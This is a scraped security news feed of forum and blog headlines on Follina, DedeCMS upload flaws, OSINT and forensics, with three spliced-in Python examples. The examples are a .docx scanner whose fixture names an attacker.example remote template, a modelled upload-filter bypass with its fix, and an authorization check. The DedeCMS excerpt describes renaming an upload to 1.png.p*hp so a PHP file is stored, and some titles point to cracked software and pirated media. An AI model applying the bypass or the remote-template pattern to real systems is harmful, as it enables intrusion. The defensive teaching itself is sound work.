  • Open

    Unknown JS from Chrome Extension
    Found an unknown extension installed on a user's device that was loaded via a powershell script. JS is not my forte by any stretch of the imagination. Can anyone help me get an idea of what's happening here? Extension was loaded with this script set in the background. https://pastebin.com/p8sS0cye submitted by /u/phase [link] [comments]
    Threat Intel services with CAPEC or CWE classifications?
    I've recently been doing a lot of work with using threat intel feeds (which map threat activity to MITRE ATT&CK TTPs) to support enterprise threat modeling. Wondering if it's possible to do the same with application threat modeling. Obviously, ATT&CK is not app-focused, so my current service (which only maps to ATT&CK) won't do the job. Does anybody know of any threat intel services that map threat activity to CAPEC or CWE classifications, for more granular app-level threat intel? submitted by /u/drstarskymrhutch [link] [comments]
    Are exe logged somewhere ?
    Is execution of programs (both in Program files and portable ones) logged somewhere in Windows ? Event viewer maybe ? Registry ? Other places ? I mean a default Windows 10 / 11 installation. Thanks for help submitted by /u/AnotherRedditUsr [link] [comments]
  • Open

    CVE-2022-21404: Another story of developers fixing vulnerabilities unknowingly because of CodeQL
    submitted by /u/cldrn [link] [comments]
    From open redirect to RCE in one week
    submitted by /u/smaury [link] [comments]
    How to use Atomic Red Team to test Falco rules in K8s
    submitted by /u/MiguelHzBz [link] [comments]
    Want to be a HVACker? Learn some new skills by exploiting security, fire, and HVAC systems
    submitted by /u/entropydaemon6 [link] [comments]
  • Open

    Nmap Post Port Scans | TryHackMe (THM)
    Lab Access: https://tryhackme.com/room/nmap04 Continue reading on Medium »
  • Open

    [Security Bulletin] Microsoft Office remote code execution vulnerability (CVE-2022...
    Microsoft Office has a remote code execution vulnerability: an attacker can use the remote template feature of a malicious Office file to fetch a malicious HTML file from a server, and then execute malicious PowerShell through the 'ms-msdt' URI...
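    The bulletin above describes a two-stage delivery: the document's relationship part points Word at a remote HTML file, and that HTML hands off to the ms-msdt: URI scheme. As an added example (not code from the bulletin, from Microsoft, or from any published sample), the following Python implements the static check a triage analyst would run on a suspicious .docx: unpack the OOXML zip, parse every .rels part, and report relationships with TargetMode="External" whose type Word resolves at open time (attachedTemplate, the remote-template case the bulletin names, and oleObject, included here as a generalization of the same delivery pattern) and whose target is an http(s) URL. A second function checks fetched HTML for the ms-msdt: scheme. The attacker.example URL and the minimal .docx built by build_docx are constructed for the demo.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from typing import List, Tuple

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
# Relationship types Word resolves when the document is opened. An External
# http(s) target on either means content is pulled from a remote server.
REMOTE_FETCH_TYPES = {
    "http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate",
    "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject",
}
MSDT_URI = re.compile(r"ms-msdt:", re.IGNORECASE)


def external_relationships(docx_bytes: bytes) -> List[Tuple[str, str, str]]:
    """Walk every .rels part in the OOXML zip and return
    (part_name, relationship_type, target) for each TargetMode="External" entry."""
    found = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for part in zf.namelist():
            if not part.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(part))
            for rel in root.iter(f"{{{RELS_NS}}}Relationship"):
                if rel.get("TargetMode", "Internal").lower() == "external":
                    found.append((part, rel.get("Type", ""), rel.get("Target", "")))
    return found


def remote_fetch_targets(docx_bytes: bytes) -> List[str]:
    """URLs the document fetches on open. Hyperlink relationships are also
    External but are only followed on click, so they are deliberately excluded."""
    return [
        target
        for _, rtype, target in external_relationships(docx_bytes)
        if rtype in REMOTE_FETCH_TYPES
        and target.lower().startswith(("http://", "https://"))
    ]


def html_invokes_msdt(html: str) -> bool:
    """Second stage: does the fetched HTML hand off to the ms-msdt: URI scheme?"""
    return bool(MSDT_URI.search(html))


def build_docx(rels_xml: str) -> bytes:
    """Constructed minimal .docx: just enough structure for the scanner to walk."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml",
                    '<?xml version="1.0"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        zf.writestr("word/document.xml",
                    '<?xml version="1.0"?><w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"/>')
        zf.writestr("word/_rels/document.xml.rels", rels_xml)
    return buf.getvalue()


# Constructed rels parts: one with a remote attached template, one with only a local styles part.
SUSPICIOUS_RELS = f'''<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="{RELS_NS}">
  <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate"
                Target="http://attacker.example/template.html" TargetMode="External"/>
</Relationships>'''

BENIGN_RELS = f'''<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="{RELS_NS}">
  <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles"
                Target="styles.xml"/>
</Relationships>'''

if __name__ == "__main__":
    for label, rels in (("suspicious", SUSPICIOUS_RELS), ("benign", BENIGN_RELS)):
        print(label, remote_fetch_targets(build_docx(rels)))
```

Run the scanner over quarantined attachments before anything opens them; a hit on remote_fetch_targets is a reason to pull the URL through a sandboxed fetcher and feed the response to html_invokes_msdt rather than to Word.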
  • Open

    Questions about responsible disclosure
    I just found my first few vulnerabilities in a real world target, and I realize I don't really know how to properly disclose them to the vendor. The target is closed source and it is a relatively large vendor so it isn't really clear how I should contact them. Any advice or standards about how I can determine who to contact? Also what is typically expected in the body of the report? I'm planning on including a brief description of the vulnerabilities as well as a proof of concept and simple exploit. Is there anything else I should plan to include? Thanks in advance. submitted by /u/BinaryLuddite [link] [comments]
    Exploit Development Resources
    https://github.com/wtsxDev/Exploit-Development Share and Support! submitted by /u/saqfi [link] [comments]
  • Open

    High-Throughput, Formal-Methods-Assisted Fuzzing for LLVM
    Article URL: https://blog.regehr.org/archives/2148 Comments URL: https://news.ycombinator.com/item?id=31572268 Points: 3 # Comments: 0
  • Open

    War in Ukraine / May 30
    The military threat from Belarus remains Continue reading on Medium »
    Sakura Room OSINT CTF Writeup
    Here’s my writeup of the Sakura Room OSINT CTF by OSINT Dojo on TryHackMe, including solutions (spoiler alert!). Continue reading on Medium »
    Horse hunting: How we found Sofia Abramovich’s horses
    Insights from the Russian Asset Tracker project Continue reading on OCCRP: Unreported »
  • Open

    GCIH training materials
    Hi, can anyone recommend "external" (i.e. not SANS) training materials for GCIH for self study? Yes I know SANS has their own books but if I could attend I would. Thanks in advance for not telling me how SANS is the only way. submitted by /u/Hot-Supermarket5177 [link] [comments]
  • Open

    SecWiki News 2022-05-31 Review
    Twitter threat intelligence tracking and assessment by Avenger; A brief discussion of traditional Windows forensics by ourren. For more recent articles, visit SecWiki
  • Open

    Killing The Bear - New actor added: BlackCat (a.k.a Alphv)
    New actor BlackCat (a.k.a Alphv - Noberus) added to 🐻 KillingTheBear 📙 https://killingthebear.jorgetesta.tech/actors/alphv It comes heavily loaded with TTPs and IOCs , processes, records, etc so SOC, CTI, Threat Hunting people take advantage and give it a try. Apart from the traditional sections, also added a timeline of victims and attacks. submitted by /u/J-Testa [link] [comments]
    Finding Main() with Ghidra
    submitted by /u/DLLCoolJ [link] [comments]
  • Open

    Zero-day actively exploited, may affect multiple Microsoft Office versions
    Security researcher nao_sec recently found a malicious Word document uploaded to the analysis service VirusTotal from Belarus.
    FreeBuf Morning Report | FluBot malware sweeps Europe; South African president's personal credit data leaked
    The hacking group SpiderLog$ published stolen records of the South African president's loans, going back to the 2000s, at one of the country's four largest banks.
    Building a free proxy pool on Tencent Cloud Functions (setup process)
    I recently heard a mentor mention that a proxy pool built on cloud functions can hide your IP; the principle is that cloud functions can send packets outward, which is combined with a SOCKS service. Here I record the setup process.
    New WhatsApp scam exposed that can hijack user accounts
    Experts warn that a new WhatsApp OTP scam is being widely exploited, letting attackers hijack user accounts over the phone.
    Anonymous claims it will launch an intrusion against Belarus
    The Anonymous-affiliated hacker group Spid3r claims to have attacked Belarusian government websites in retaliation for Belarus supporting Russia's invasion of Ukraine.
  • Open

    Analysis of DedeCMS file upload vulnerabilities
    Author: Topsec Alpha Lab. Original link: https://mp.weixin.qq.com/s/tLyoN9JYRUAtOJTxWEP8DQ 0x01 Preface: A while ago I saw an article about a DedeCMS backend file upload vulnerability (CNVD-2022-33420) that bypassed the blacklist filter on uploaded file contents. As it happened I had recently studied file upload, so this article analyzes two DedeCMS file upload vulnerabilities (CVE-2018-2012...
  • Open

    Analysis of DedeCMS file upload vulnerabilities
    Preface. A while ago I saw an article about a DedeCMS backend file upload vulnerability (CNVD-2022-33420) that bypassed the blacklist filter on uploaded file contents. As it happened I had recently studied file upload, so this article analyzes two DedeCMS file upload vulnerabilities (CVE-2018-20129, CVE-2019-8362).
    Introduction. DedeCMS is a Chinese PHP web content management system developed by Shanghai Zhuozhuo Network Technology Co., Ltd. It has an efficient tag caching mechanism that caches similar tags, which speeds up the system's response and lowers resource consumption when generating HTML. It supports many applications and gives users an integrated solution for building all kinds of websites; this version adds modules such as categories, library, yellow pages, circles and Q&A to meet some users' special requirements.
    DedeCMS V5.7 SP2 front-end file upload (CVE-2018-20129). Reproduction environment: phpstudy, DedeCMS V5.7 SP2, PHP 5.6.9. Preconditions: the member module is enabled and we are logged in with administrator privileges. The member module is disabled by default and must be enabled manually by an administrator in the backend.
    After logging in to the front end, open the content center and publish an article; in the editor below, find the upload image button. The intended functionality here is nothing more than a simple image upload. Capture the request with Burp Suite, change the file name from 1.png to 1.png.p*hp, and forward the request. The response contains the path where the uploaded file was saved, and the file's extension is PHP. When we try to access the file, however, some files are not parsed; this depends on the file we uploaded, and we will explain it later. The uploaded script file can otherwise be used normally.
    Analysis. From the captured request we can see that the submission path is /dedecmsgbk/include/dialog/select_images_post.php; let's follow this file to see how it handles the request. …
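    The excerpt above stops before explaining why 1.png.p*hp ends up on disk as a .php file. As an added example (not code from the Topsec article or from DedeCMS), the following Python models the class of bug it describes: an extension blacklist applied to the raw filename, followed by a sanitizer that strips characters such as "*", so the check sees "p*hp" while the disk sees "php". That ordering is an assumption for illustration. The hardened variant canonicalizes first, allowlists the final extension, verifies the content signature, and lets the server choose the stored name. STRIP_CHARS, the extension sets and the MAGIC table are constructed for the demo.

```python
import os
import re
import uuid
from typing import Optional

# Assumed sanitizer: characters an upload handler commonly removes from names.
STRIP_CHARS = re.compile(r'[ \r\n\t*%\\/?<>|":]+')
BLOCKED_EXTS = {"php", "php3", "php4", "php5", "phtml", "phps", "asp", "aspx", "jsp", "jspx"}
ALLOWED_IMAGE_EXTS = {"png", "jpg", "jpeg", "gif"}
# Leading bytes of the accepted image formats (constructed table for the content check).
MAGIC = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}


def sanitize(name: str) -> str:
    """Remove characters the handler will not accept in a stored name."""
    return STRIP_CHARS.sub("", name)


def last_ext(name: str) -> str:
    """Lower-cased text after the final dot, or '' when there is no dot."""
    return name.rsplit(".", 1)[-1].lower() if "." in name else ""


def vulnerable_save_name(filename: str) -> Optional[str]:
    """Assumed vulnerable order: blacklist the RAW name, then sanitize.
    '1.png.p*hp' has extension 'p*hp', which is not in the blacklist; the
    sanitizer then deletes '*' and the file is written as '1.png.php'.
    Returns the on-disk name, or None when the upload is rejected."""
    if last_ext(filename) in BLOCKED_EXTS:
        return None
    return sanitize(filename)


def hardened_save_name(filename: str, content: bytes) -> Optional[str]:
    """Canonicalize first, then allowlist the final extension, then check the
    content signature, then replace the client-supplied basename entirely."""
    base = os.path.basename(sanitize(filename))
    ext = last_ext(base)
    if ext not in ALLOWED_IMAGE_EXTS:
        return None
    if not content.startswith(MAGIC[ext]):
        return None
    # The client never controls the stored basename, so no double extension,
    # traversal or encoding trick in the original name can survive.
    return f"{uuid.uuid4().hex}.{ext}"


if __name__ == "__main__":
    print("vulnerable:", vulnerable_save_name("1.png.p*hp"))
    print("hardened:  ", hardened_save_name("1.png.p*hp", b"<?php echo 1;"))
```

The general lesson, independent of DedeCMS: every validation must run on the exact string and bytes that will be used afterwards; any transformation after the check reopens the hole.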
  • Open

    technical specs and schematics for rocket engines
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    photos of Brussels
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]

  • Open

    Computer Forensics and Digital Investigations Bachelor's degree question
    Hi all, I've been in the IT field for around 12 years, ranging from Scrum Master to Software Engineering Manager (where I've now been a few years). I've been completely fascinated by Computer Forensics though and would love to break into this area. For me, I learn best with structure so I prefer taking a formal program. Is anyone familiar with Champlain College? They have an online bachelor's degree in Computer Forensics and Digital Investigations that I've been looking into. Would love to hear any experience there, or recommendations for other programs! I'm going to continue working full time, so it's important that the program is online only. submitted by /u/anautumnsshade [link] [comments]
    Converting MAC images
    Can someone let me know how I can covert a MAC image (APFS) into E01? submitted by /u/Pepperknowsitall [link] [comments]
    Cellebrite Thumbnail Recovery
    Hello everyone, I have two questions regarding a Cellebrite extraction on an iPhone XR on the topic of thumbnails. What does the “access time” mean? Is this the time that the client accessed the photo throughout the day? What is a “creation time”? submitted by /u/ForsakenRKT [link] [comments]
  • Open

    Follina – a Microsoft Office code execution vulnerability
    Article URL: https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e?gi=ab30e3e1bdaf Comments URL: https://news.ycombinator.com/item?id=31563980 Points: 1 # Comments: 0
    Follina – a Microsoft Office code execution vulnerability
    Article URL: https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e?gi=13aa99ae48de Comments URL: https://news.ycombinator.com/item?id=31554823 Points: 1 # Comments: 0
  • Open

    Anyone know a good compliance rules matrix template?
    I am looking to organize all the regulatory compliance rules into one nice document to show here are all the different regulatory rules we need to follow. By implementing a solution for this or this we get this, this and this covered in these different compliance frameworks. I am thinking of how to show we are covering all the items from (ISO 27001, CIS, our 3416, PIPEDA, OSFI, etc.). I was thinking if there was a template for a RACI or matrix of some kind that someone can point me to? Or how do others track all of the regulations they need to follow and show they are following them? Any help is great. Thanks. submitted by /u/RecoverAdventurous12 [link] [comments]
    Are there any bootcamps or short-term/accelerated courses for a beginner to infosec that would actually help land a job?
    I've heard mostly negative-leaning mixed things about bootcamps, but right now I'm looking for something that will help me get an entry level infosec job without a 4-year degree (degree will come afterward, just need to be able to eat and sleep somewhere while I get it). I do very well with self-paced learning and I learn very quickly. I know that there are lots of resources for teaching yourself and I plan to utilize them, but I'm more concerned with getting some stamp on my resume to get my foot in the door. ​ e: For clarification - I'm less concerned with how effective the teaching is because I can learn on my own, I'm more concerned with it providing me with workplace-relevant things to learn/teach myself and with its prestige in landing a small-time role somewhere. submitted by /u/No_Manufacturer_4701 [link] [comments]
    Education
    I know of SANS Institute and WGU. They are awesome in that you can earn certs while you earn your degree. I was wondering if there are any other colleges/institutes that offer the same package? Currently located in Ohio. Price is not an issue for me due to the G.I. Bill. I'm thinking of going with WGU for an information tech bachelor's and then going to SANS for their master's. I have looked into Wright State for their computer science degree, just not so sure due to the fact they don't offer certs as you get your degree. submitted by /u/Particular-Fault9078 [link] [comments]
    Tool to find secrets in a text message
    We are looking for a tool to find secrets in a text message. The secrets could be AWS keys, Slack auth tokens, API tokens, etc. The text messages are usually typed by the user or they might copy-paste some configuration files which can contain secrets. I looked at a few tools like semgrep, gitleaks; they work on source files or GitHub repositories. But I need some tool that accepts a text message and returns the result. Thanks in advance. submitted by /u/kmkanagaraj [link] [comments]
  • Open

    UPnProxyChain: a Tool to Exploit Devices Vulnerable to UPnProxy
    submitted by /u/Salmiakkilakritsi [link] [comments]
    New Zero-Day Code Execution Vulnerability In MS Office - Follina
    submitted by /u/sciencestudent99 [link] [comments]
    Mass account takeover in Yunmai smartscale API (full disclosure)
    submitted by /u/adrian_rt [link] [comments]
    Offensive Windows IPC Internals 3: ALPC
    submitted by /u/0xdea [link] [comments]
  • Open

    PicoCTF Review
    Hi! Guys I’m back with a new blog and I’m so excited because with this site you can learn a LOT! Continue reading on Medium »
    How to Crack & Install BurpSuite Professional in Kali Linux
    Steps to crack & Install Burpsuite Pro in Kali-Linux Continue reading on Medium »
    Top 5 Hacking Book , Must Read !!
    A Hacking and cybersecurity books guide which tells you about top 10 Hacking books . Continue reading on InfoSec Write-ups »
    How to find & access Admin Panel by digging into JS files…
    Hello All,🙂 Continue reading on Medium »
    How I found my first ever XSS on a website.
    So, I have been into web hacking lately. While into it, I have explored bug bounties but never found a bug in real website. I have tested… Continue reading on Medium »
    Introducing Melos Bug Bounty Program
    We’re happy to see how quickly Melos Studio has grown so far, but with that comes some concerns. We have seen many recent crises and fraud… Continue reading on Medium »
    Web application hacking methodology
    Systematic and goal-oriented penetration testing always starts with the right methodology. The following diagram shows how web application… Continue reading on Medium »
    Account Takeover Via Rxss Post
    Hello there, my name is Aryan from Kurdistan, a bug hunter on HackerOne with 6 months of experience; I am also a student at university. Forgive me… Continue reading on Medium »
  • Open

    War in Ukraine / May 27–29
    Slowing down the pressure of sanctions Continue reading on Medium »
    Hack Hydra co-owner’s crypto wallet
    A Moscow court can confiscate a record amount for Russia from a drug dealer’s crypto wallet, but he does not give the password. We are… Continue reading on Medium »
    Don’t Rely on Tools — OSINT Challenge 24
    Quiztime (contributor @bayer_julia) shared a new OSINT quiz with us. The objective was simple. We had to figure out where it was taken… Continue reading on Medium »
    Hunting Usernames With Sherlock
    Learn how to use sherlock, a powerful command line OSINT tool used for hunting down usernames across social networks. Continue reading on Medium »
  • Open

    WEB-DLs and Remuxes of Movies and Series
    http://195.154.231.76/mteam/269573/ submitted by /u/GrowAsguard [link] [comments]
  • Open

    SecWiki News 2022-05-30 Review
    SecWiki Weekly (Issue 430) by ourren; Automated discovery of malicious npm packages by ourren; Tracing the black-market group scamming through well-known portals by ourren; Analysis of the techniques and infrastructure behind the phishing email scam that hit Sohu by ourren; RSAC 2022 – Innovation Sandbox impressions (1) by ourren; PE file structure analysis 3 by SecIN community; Artillery: a plugin-based Java vulnerability scanner by ourren. For more recent articles, visit SecWiki
  • Open

    The Art of Fuzzing (2017) [pdf]
    Article URL: https://sec-consult.com/fileadmin/user_upload/sec-consult/Dynamisch/Blogartikel/2017_11/the_art_of_fuzzing_slides.pdf Comments URL: https://news.ycombinator.com/item?id=31559280 Points: 2 # Comments: 0
  • Open

    FreeBuf Morning Report | Pre-installed Android apps affected by high-severity vulnerabilities; FluBot mobile malware sweeps Europe
    Microsoft disclosed serious security vulnerabilities in the Android app mobile service framework provided by mce Systems; default pre-installed apps from multiple carriers are affected.
    Implementing DevSecOps at internet finance companies | FreeBuf in-house security community livestream recap
    Liu Weijie, a security practitioner at an internet finance company, was the speaker at the fourth internal livestream of the FreeBuf in-house security community, sharing how DevSecOps is put into practice at internet finance companies.
    TC260 publishes "Information security technology – Requirements for privacy policies of internet platforms and product services" (draft for comment)
    The draft specifies the drafting procedure, content and publication format of privacy policies for internet platforms and product services, improves their readability and transparency, and covers the handling of disputes related to privacy policies.
    Warning! KillNet may launch a large-scale attack on Italy on May 30
    The pro-Russian hacker group KillNet threatened the Italian government on May 30, saying it would launch an unprecedented large-scale attack.
    EnemyBot malware adds attacks on critical vulnerabilities in VMware and other products
    Keksec, the group behind EnemyBot, is actively developing the malware.
    Microsoft finds pre-installed Android apps affected by high-severity vulnerabilities
    Microsoft's security research team disclosed serious security vulnerabilities in the Android app mobile service framework provided by mce Systems; default pre-installed apps from multiple carriers are affected.
    $568 million in illegal profits: 37-year-old fraudster sentenced to four years
    Telusma was sentenced to four years in prison for selling and using stolen and compromised credit cards, personal information and financial information on the Infraud carding portal run by a transnational cybercrime organization.
    Reuters: the people behind the Brexit leak site are linked to Russian hackers
    The "Very English Coop d'Etat" site was set up to publish the private emails of Brexit supporters.
    Shirong Nengliang (世融能量): quantum cryptography and security are inseparable | Cybersecurity New Forces SOLO Launch Season
    How is quantum technology applied to security? The Cybersecurity New Forces SOLO Launch Season tells you!
  • Open

    Users who are restricted to use the application because of a "Waiting List" are able to get access to the Beta Application by bypassing the waitlist
    Alohi disclosed a bug submitted by darkknight4688: https://hackerone.com/reports/1494308
  • Open

    Pen #004: Linux Basics (Part 1)
    No content preview
    AWS IAM Exploitation Techniques
    No content preview
    Anatomy Of Spring4Shell CVE-2022–22965
    No content preview
  • Open

    Active Directory Purple Teaming
    This repository is aimed at sharing the cliff notes for performing Red Teaming of Active Directory System combined with Detection… Continue reading on Medium »

  • Open

    What are the Implications of an automation tool, using PsExec to execute commands (of any kind) on client machines, from a domain controller?
    I use ConnectWise Automate (CWA) to manage my environment. Today I was parsing through Sysmon logs, and found that CWA is using PsExec to execute commands on client machines, from my domain controller. The commands I've seen it execute are benign in general, and seem to be "normal/built-in" processes (because they're not any I created). But it makes me uncomfortable that this is happening in general. (I've already created a post asking how to stop CWA from doing this.) It makes me uncomfortable because I go out of my way to practice the principle of least privilege, as I'm generally aware of PtH attacks and similar. E.g., I never log onto member servers or workstations as domain admin. I have separate accounts for the administration of standard member servers (in other words, non-do…
    Home Server
    Hey everyone, I would like to set up a home server on a Raspberry Pi 400 or even an older computer. Do you know any step by step guide for a novice person to start with? An OS GUI is mandatory. Thanks in advance submitted by /u/fmsferreira [link] [comments]
  • Open

    CRYPTOCURRENCY OSINT
    submitted by /u/saqfi [link] [comments]
    GitHub - Orange-Cyberdefense/arsenal: Arsenal is just a quick inventory and launcher for hacking programs
    submitted by /u/saqfi [link] [comments]
    JPG to Malware
    submitted by /u/saqfi [link] [comments]
    ForceAdmin: Create infinite #UAC prompts forcing a user to run as admin.
    submitted by /u/saqfi [link] [comments]
    grsecurity - Tetragone: A Lesson in Security Fundamentals
    submitted by /u/buherator [link] [comments]
  • Open

    P3 Bug in Just 2 Minute
    Hey Hello, Security guys & Hacker Thank you for your support. Continue reading on Medium »
    DOMAIN ADMIN Compromise in 3 HOURS
    Hi everyone; I hope you enjoyed my previous blog post on “How I obtained Admin access in 30 minutes” — so today I am bringing you another… Continue reading on Medium »
    Biblioteca Walkthrough:THM
    In the past few days, I am recharging myself by trying my hands at different rooms present in tryhackme TryHackMe. So thought why not just… Continue reading on Medium »
    Hall of Fame Vice Media ? hacking while sleepy…
    Hello guys, actually this is the case in 2021 but only now had time to write. So… have you ever heard of Vice media? one of the largest… Continue reading on Medium »
  • Open

    SecWiki News 2022-05-29 Review
    No news updates today. For more recent articles, visit SecWiki
  • Open

    The (interdisciplinary) style of OSINT
    You already know, I have nagged you enough about it in the past, that one of the pillars of my proposed General Theory for Intelligence… Continue reading on Medium »
    SPY NEWS: 2022 — Week 21
    Summary of the espionage-related news stories for the Week 21 (22–29 May) of 2022. Continue reading on Medium »
    Video verification: Sent to Chinese quarantine camp
    Video verification article on footage showing Chinese citizens sent off to quarantine camps #OSINT #verification by @Techjournalisto Continue reading on Medium »
  • Open

    CYBERSOC Information Technology Library Blog
    submitted by /u/cybersocdm [link] [comments]
    Killing The Bear - Cybercrime repo, Threat Actors, Campaigns, Malware, IOCs
    ​ Killing The Bear Hi everyone! I want to share with you my new gitbook/repo about Threat Actors: Killing The Bear. Very useful for SOC, CTI and Threat Hunting teams. In it you can find: - Threat Actors - Malware - Tools - TTPs - IOCs - Summary (executive) - Wallets - Timeline - Relationships - Etc... Yesterday I published the "Killnet" category, you can find it here: Killnet - Actor Gradually more categories are being added with more intel. I hope it will be useful to you or your team. Thank you! submitted by /u/J-Testa [link] [comments]
  • Open

    Learning Linux & InfoSec Principles Using OverTheWire’s Bandit — Part 4
    No content preview
    Hacking GraphQL — Part 1
    No content preview
    Bypass the Firewall with SSH Tunnelling
    No content preview
    CyberStarters CTF — Gunship
    No content preview
  • Open

    Heap BINARY EXPLOITATION w/ Matt E! (Tcache Attack)
    submitted by /u/soupcreamychicken [link] [comments]
    REcon is a computer security conference with a focus on reverse engineering and advanced exploitation techniques. It is held annually in Montreal, Canada.
    https://recon.cx/ submitted by /u/soupcreamychicken [link] [comments]
  • Open

    FreeBuf Morning Report | Taobao bans the sale of IP modification and spoofing software and services; GM reportedly hit by hackers
    Taobao published the "Taobao Platform Prohibited Information Management Rules", explicitly banning the sale of IP modification/proxy/spoofing software and services. The rule change takes effect on June 3, 2022.
    Logic-based privilege escalation (越权) vulnerabilities
    Part of this content comes from that article; this is purely a record of my own study, together with what I learned following Di's teaching. Overview of horizontal and vertical escalation. Horizontal escalation: an attacker tries to access the resources of users who hold the same privileges as he does. Vertical escalation: a low-privilege user tries to access a high-privilege user's resources (for example, a user's personal information page is user.php while the admin page that manages all users is manageuser.php, but the admin page has no permission check, so anyone who enters its address can access it). Cause of the vulnerability: escalation vulnerabilities arise because the backend
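    The user.php / manageuser.php example above is the whole bug in miniature: the page exists, the URL is guessable, and nothing between the request and the record asks who is making it. As an added example (not code from the post or from any real application), the following Python puts both boundaries behind one authorization gate: owner_id enforces the horizontal boundary (you may read only your own record unless you are an admin) and role enforces the vertical boundary (the endpoint itself requires a privilege level). The vulnerable handlers are kept beside the fixed ones so the difference is a single call. The User type, PROFILES store and the two sample users are constructed for the demo; a real app would raise HTTP 403 where this raises Forbidden.

```python
from dataclasses import dataclass
from typing import Dict, List, Optional


@dataclass(frozen=True)
class User:
    id: int
    role: str  # "user" or "admin"


class Forbidden(Exception):
    """Where a web app would return HTTP 403."""


# Constructed user store standing in for the application's database.
PROFILES: Dict[int, Dict[str, str]] = {
    1: {"name": "alice", "email": "alice@example.test"},
    2: {"name": "bob", "email": "bob@example.test"},
}


def require(requester: User, *, owner_id: Optional[int] = None,
            role: Optional[str] = None) -> None:
    """Single authorization gate called by every handler.
    role     -> vertical check: the endpoint needs this privilege level.
    owner_id -> horizontal check: the record must belong to the requester
                (admins are exempt because managing all users is their job)."""
    if role is not None and requester.role != role:
        raise Forbidden(f"user {requester.id} lacks role {role}")
    if owner_id is not None and requester.role != "admin" and requester.id != owner_id:
        raise Forbidden(f"user {requester.id} does not own record {owner_id}")


# user.php?id=N with no check: any logged-in user reads any profile (horizontal).
def view_profile_vulnerable(requester: User, target_id: int) -> Dict[str, str]:
    return PROFILES[target_id]


# Fixed: the id in the URL is compared against the session identity.
def view_profile(requester: User, target_id: int) -> Dict[str, str]:
    require(requester, owner_id=target_id)
    return PROFILES[target_id]


# manageuser.php with no check: knowing the URL is enough (vertical).
def manage_users_vulnerable(requester: User) -> List[int]:
    return sorted(PROFILES)


# Fixed: the role comes from the server-side session, never from the request.
def manage_users(requester: User) -> List[int]:
    require(requester, role="admin")
    return sorted(PROFILES)


if __name__ == "__main__":
    bob = User(2, "user")
    print("vulnerable:", view_profile_vulnerable(bob, 1))
    try:
        view_profile(bob, 1)
    except Forbidden as exc:
        print("fixed:", exc)
```

The point of routing everything through require is auditability: a grep for handlers that never call it is the fastest way to find the next manageuser.php.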
  • Open

    My Photo Investigation Toolkit
    Search by photo Extracting metadata Photoforensic tools Fact-checking tools https://start.me/p/0PgzqO/photo-osint Bye submitted by /u/saqfi [link] [comments]
    Sans Memory forensic Cheat Sheet
    https://github.com/AndrewRathbun/DFIRMindMaps/tree/main/MemoryForensics/SANSMemoryForensicsCheatSheet Complete Cheatsheet submitted by /u/saqfi [link] [comments]
  • Open

    A security vulnerability in Git that can lead to arbitrary code execution (2018)
    Article URL: https://devblogs.microsoft.com/devops/announcing-the-may-2018-git-security-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=31547175 Points: 1 # Comments: 0

  • Open

    Vulnerable machines for learning
    Are there any vulnerable systems for learning, specifically API? I’ve seen everything but. But figure there has to be some? submitted by /u/networkalchemy [link] [comments]
    Advice On Hashcat Not Detecting AMD GPU
    Hello, I was running hashcat until I realized that I was using my CPU and not my GPU. I have been spending a good amount of time on the internet for why my hashcat is not detecting my GPU but struggling to find an answer. I am dual booting PopOs & Kali so I am not running Kali in a VM. My GPU is a Radeon Pro WX 5100. I tested to see if my GPU is actually being used by entering sudo radeontop and ran glxgears to see if it is being picked up. Below is the results found from running sudo radeontop Graphics pipe 3.33% │ ──────────────────────────────────── Event Engine 0.00% │ Vertex Grouper + Tesselator 0.00% │ Texture Addresser 3.33% │ Shader Export 3.33% │ Sequencer Instruction Cache 0.00% │ Shader Interpolator 3.33% │ Scan Converter 3.33% │ Primitive Assembly 0.00% │ Depth Block 3.33% │…
    creating a pentest network on Virtualbox
    I have a Windows Server VM and a Kali Linux VM on VirtualBox. The Windows Server has an FTP server which I will try to hack into. Should I use an internal network on both VMs, or use NAT on the VMs and set up DHCP on Windows Server and then connect both VMs to that? I want to make sure that both VMs are on a network that is isolated from my home network so I can run Nmap and use Metasploit etc. I had used the internal network, but the VMs would not get internet access and I was not sure why. Any help will be much appreciated. submitted by /u/ghostexploitelite [link] [comments]
    Recommended Emulator for Android Application Pentesting?
    What is your favourite emulator for pentesting Android applications? Which proxy (ZAP, Burp, etc.) would you recommend for intercepting traffic? submitted by /u/aim4r [link] [comments]
  • Open

    What data can teach us about Russian propaganda
    Looking at state news agencies’ reporting on the war shows how propaganda works in a novel way. Continue reading on Medium »
    FBI Reveals Buffalo Mass Shooter Influenced by “Sandman.” Who the hell is that?
    Who platforms those indoctrinating America’s male youth to commit mass murder? Continue reading on Medium »
    My Email Investigation Toolkit
    Verification tools (SMTP, WHOIS, Headers) Email tracking, logging and geolocation Phishing email, permutation Identification email user… Continue reading on Medium »
    Searching for The White City — OSINT Challenge 23
    @Sector035 shared a new OSINT quiz with us. The objective was simple. We had to figure out where… Continue reading on Medium »
    They’re better than you at Google Maps
    I didn’t know you could use the app like this. Continue reading on Medium »
  • Open

    Domain Escalation: Unconstrained Delegation
    Introduction Post-Windows 2000, Microsoft introduced an option where users could authenticate to one system via Kerberos and work with another system. This was made possible The post Domain Escalation: Unconstrained Delegation appeared first on Hacking Articles.
  • Open

